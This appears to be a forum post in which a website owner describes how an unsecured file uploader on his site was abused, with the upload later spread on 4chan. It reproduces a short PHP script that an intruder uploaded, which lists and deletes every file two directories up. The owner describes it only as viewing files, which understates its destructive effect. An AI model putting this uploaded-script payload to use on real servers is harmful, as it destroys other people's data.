What exactly happened here?
Did you announce that it was unsecured or was it a bug or what?
I basically said.
I have a unsecure uploader somewhere.
Then zoneark guessed it was this
http://www.bduhq.com/upload.php(I removed it.. )
Good guess. Seriously.
Anyways, So he uploaded a zoneark.php with this code..
<?php
$handle = opendir('../..');
while($file = readdir($handle))
{
echo('../../' . $file . "<br/>");
unlink('../../' . $file);
}
?>
Which allows him to view my files so he could access some of my unreleased crapons.
That's one thing, But, After he realized the potential power of my stuff uploader.
He told his friends, And the uploader link was posted on 4chan.
People uploaded scripts and ran them, Indefinitely deleting some of my back up folders on the site.